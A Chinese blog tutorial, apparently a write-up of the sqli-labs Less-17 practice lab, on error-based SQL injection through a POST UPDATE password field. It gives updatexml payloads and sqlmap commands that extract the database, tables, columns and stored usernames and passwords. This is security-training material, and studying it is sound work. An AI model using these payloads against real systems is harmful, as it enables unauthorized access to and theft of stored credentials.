POST Update语句注入

最新推荐文章于 2024-01-21 20:01:25 发布
最新推荐文章于 2024-01-21 20:01:25 发布
阅读量1.1k 收藏
点赞数 2
分类专栏: 渗透测试学习 信息安全 Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m_de_g/article/details/121771372
版权

mysql 安全 数据库

POST Update语句注入

1.MySQL update介绍

update语句可以用来修改表中的数据,简单来说基本的使用形式为:
update 表名 set 列名称=新值 where 更新条件;

UPDATE table_name SET field1 = new-value1,field2=new-value2[WHERE Clause]

我们在MySQL命令行中展示,我们以id=8username=adminpassword=admin为例

在这里插入图片描述
执行更新语句

update users set password='admin888' where username='admin';

在这里插入图片描述
可以看到用户名为admin的密码,成功更新为admin888

2.过滤内容介绍

sqli-labs17关为例,源代码如下所示
在这里插入图片描述
判断是否有单引号存在

3.MySQL update注入

分析源代码可以发现,仅仅是对username进行了过滤
在这里插入图片描述
在下面,我们又可以发现一条更新的语句

$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";

在这里插入图片描述
可以闭合前面的单引号,后面执行我们的SQL语句.

1.进行抓包
当我们使用反斜杠,可以看出password是单引号闭合

uname=admin&passwd=admin\&submit=Submit

在这里插入图片描述

2.闭合单引号,爆破数据库

1'and (updatexml(1,concat(0x7e,database(),0x7e),1)) #

在这里插入图片描述
3.获取数据表信息

admin' and (updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1))#

在这里插入图片描述
4.获取字段
爆破第一个字段

admin' and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x7e),1))#

在这里插入图片描述

爆破第二个字段

admin' and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 1,1),0x7e),1))#

在这里插入图片描述
爆破第三个字段

admin' and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 2,1),0x7e),1))#

在这里插入图片描述
5.爆破字段内容

dmin' and (updatexml(1,concat(0x7e,(select username,password from users limit 0,1),0x7e),1))#

在这里插入图片描述

You can't specify target table 'users' for update in FROM clause

解决报错的方法,不能使用先select表中的某些值,在update这个表(在同一语句中)。

解决方法:将select出的结果作为派生再select一遍,这样就规避了错误。

admin' or updatexml(1,concat(0x7e,(select * from (select username from users limit 0,1) a),0x7e),1)#

在这里插入图片描述

admin' or updatexml(1,concat(0x7e,(select * from (select password from users limit 0,1) a),0x7e),1)#

在这里插入图片描述

4.sqlmap安全测试

1.获取数据库信息

python2 sqlmap.py -r "1.txt" --dbs

在这里插入图片描述
2.获取表名

python2 sqlmap.py -r "1.txt" -D security --tables

在这里插入图片描述
3.获取字段名及内容

python2 sqlmap.py -r "1.txt" -D security -T users --dump

在这里插入图片描述

5.ps

(1)因为我选择的是默认情况,所以burpsuit不回显数据,但是在前端构造语句也是一样的,可以爆破出数据库及其内容。
(2)由于我的sqlmap出现问题,渗透测试的时候使用了默认情况

6.参考链接

https://www.cnblogs.com/llcn/p/12744772.html

山川绿水
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
25-4 SQL注入攻击 - update注入
weixin_43263566的博客
03-09 789
使用mysql函数:代码中使用了过时的mysql函数来执行SQL查询,而不是使用更安全mysqli或PDO。mysql函数对于SQL注入攻击是脆弱的,因为它没有提供预处理语句的功能。黑名单过滤只能防止已知的攻击字符串,而无法应对所有可能的变种和绕过方法。替换为适合您情况的实际条件,以确保只有符合条件的行会被更新。获取用户输入的ID值,但没有对其进行充分的验证和过滤,直接将其用于SQL查询。自定义的黑名单过滤机制:代码中使用了自定义的黑名单函数。用户输入未经过充分验证和过滤:在代码中,通过。
insert/update注入
Ethan024的博客
03-30 1015
insert/update注入 实验环境: 皮卡丘靶场—insert/update注入 原理: insert注入(注册新用户): 后端没有做防SQL注入处理,在前端注册的信息,通过insert直接拼接到数据库中; insert into member(username, pw, sex, phonenum, email, address) value (‘xiaohong’, 1111, 1, 2, 3, 4) insert语句一般通过or进行闭合: insert into member(userna
安全】P 2-12 POST Update语句注入
Z_David_Z的博客
02-14 245
目录0X01 MySQL update介绍0X02 过滤介绍0X03 MySQL update注入0X04 sqlmap安全测试 MySQL update介绍 过滤介绍 MySQL update注入 sqlmap安全测试 0X01 MySQL update介绍 update 语句可用来修改表中的数据, 简单来说基本的使用形式为: update 表名称 set 列名称=新值 where 更新条件; UPDATE table_name SET field1=new-value1, field2=new-valu
POST Update 注入
LoveStarbucks的博客
01-03 706
POST Update 注入 1.Mysql update介绍 2.过滤内容介绍 function check_input($value) { if(!empty($value)) { // truncation (see comments) $value = substr($value,0,20);//获得下标从0到20的字符串 } // Stripslashes if...
Post Update语句注入
qq_43776408的博客
06-12 1279
Mysql Update介绍 过滤内容介绍 我相信你能看懂代码的 Mysql update注入 以Less-17为例 从代码可以看出没有对password过滤,73行 只过滤了uname,71行 所以我们找到含有password的sql语句 为下图的94行 按照之前学的很容易想到 使用’ sql语句–+就可以了 这里我们使用针对update的sql注入方法 上面那条语句加到抓到的包中的最下面 最后 看右边的左边下面那行黄子 爆出了版本信息 你也可以自行更改sql语句 sqlmap安全测试 .
sqli-labs靶场实现(七)【post update语句注入】(less-17、具体步骤+图文详解)
weixin_46709219的博客
12-30 805
一)post update语句注入   1)mysql update介绍   2)过滤内容介绍   3)mysql update注入   4)sqlmap安全措施 —————————————————————————————————————————————————— 一)post update语句注入 1)mysql update介绍 2)过滤内容介绍 3)mysql update注入 4)sqlmap安全措施 ...
SQL注入实战:Update注入
最新发布
ting_liang的博客
01-21 980
有的程序员在写源代码的时候,只是对查询的sql语句的用户输入内容进行了过滤,忽略了updateupdate表名称set列名称=新值where更新条件;1、sqli-labs less-17关。类型sql语句的用户输入的内容的过滤。二、mysqlUpdate语句复习。如下图所示,爆出数据库名称。一:Update注入原理。如下图所示,爆出版本信息。
SQL注入批量更新语句
一个世界一个家,我爱中国!
03-14 3406
--sql 2000解决方法DECLARE @fieldtype sysnameSET @fieldtype=varchar--删除处理DECLARE hCForEach CURSOR GLOBALFORSELECT Nupdate +QUOTENAME(o.name)+N set  + QUOTENAME(c.name) + N = replace( + QUOTENAME(c.
git post-update
07-30
服务器代码库工作区不更新问题解决,具体问题描述请参看 http://blog.csdn.net/lanyang123456/article/details/76378229
update语句_WEB安全之SQL注入(13)——update注入
weixin_39848953的博客
12-09 2624
01前言大家好,我是阿里斯,一名IT行业小白。上一篇文章分享了insert注入,算是一个铺垫,今天我们一起来看看update注入update注入是非常危险一种注入。可能因为payload构造不合理会直接导致整张表都被修改。02update注入update正常语句update users set sex='man' where id=$id;update注入是非常危险的,不管你开发还是安...
第十二节 POST update语句注入-01
09-15
"POST update语句注入" 在数据库安全领域中,SQL 注入是一种常见的攻击方式,而在 Web 应用程序中,POST 请求也可能存在 SQL 注入漏洞。今天我们将讨论 POST update 语句注入的相关知识点。 MySQL update 介绍 ...
[less17][sqli靶场] 对update语句注入
qq_37301470的博客
11-13 304
与以往的登录界面不同 这是个修改密码的php页面 在对uname进行了各种闭合之后发现一直返回同一结果,延时也没用 无能为力只能看看源码 源码如下 <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0); function check_input($value) { if(!empty($value)) { // tr
git post-update
燕雀笔记博
01-05 1381
cd "/web/einstein/" unset GIT_DIR git pull exec git-update-server-info    
update注入的一个小trick
vspiders的博客
06-18 343
0x01 Mysql特性Mysqlupdate语句的定义如下:UPDATE table_name SET field1 = new-value1, field2 = new-value2 [WHERE Clause]但是偶然发现,field1与field2两字段可以同名,并且UPDATE之后的字段内容会以field2的赋值为准。如上图中,Link字段被赋值了两次,最终的该Link字段的内容以最后...
post mysql更新语句_MySQL 更新语句 update 踩坑日记
weixin_42512096的博客
02-02 165
背景最近在一次线上作业过程中执行了一句DML语句,本以为万无一失,结果应用反馈说没有更新,数据还是没有变,最后经过排查才发现是我语句写错了,导致update语句执行的结果与预期不符。情景再现为了方便演示,建立一张用户表,同时插入五条数据。create table user(id int(12) comment '用户主键id',name varchar(36) comment '用户名',age ...
update post put
weixin_41315469的博客
04-04 720
我发现一个很奇怪的现象,我修改jsp的时候,控制器里面是:@RequestMapping(value = "/student/{id}",method = RequestMethod.PUT) public String updateStudent(@PathVariable("id") int id,String name,int qq,String major){ Stud...
1.update注入逻辑
qq_42201502的博客
01-21 296
这里是对于Mysql update指令的注入讲解,首先要先来介绍一下update函数的使用 UPDATE是对Mysql中数据修改的指令,想要修改数据库中的一些数据就需要用到UPDATE UPDATE users SET gold = gold+10000 WHERE username=admin 通过这一指令我们就可以对数据库中的数据进行修改将username=admin的这一列的gold加10000 现在来构建一个PHP页面和一个HTML页面 首先是test.html <
POST一般用于更新资源信息,通常会用来传输实体的本体,用GET方法也可以传输实体的主体
weixin_58357488的博客
06-29 1049
POST请求与GET请求的区别:GET一般用于获取和查询资源信息,指定的资源经服务器端解析后返回响应内容,必要时,可以将查询字符串参数追加到URL末尾,以便将信息发送给服务器。POST一般用于更新资源信息,通常会用来传输实体的本体,用GET方法也可以传输实体的主体,但一般不用GET方法进行传输,而是用POST方法,虽然GET方法和POST方法很相似,但是POST的主要目的并不是获取响应的主体内容。 一、http协议其他的请求方式是什么? HEAD:获得报文首部,GET方法有实体,HEAD方法无实体。..
sql注入总结(时间盲注,布尔盲注,无列名注入,regexp盲注,order by注入,二次注入update注入,报错注入)
2202_75361164的博客
10-28 2020
sql注入总结(时间盲注,布尔盲注,无列名注入,regexp盲注,order by注入,二次注入update注入,报错注入)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值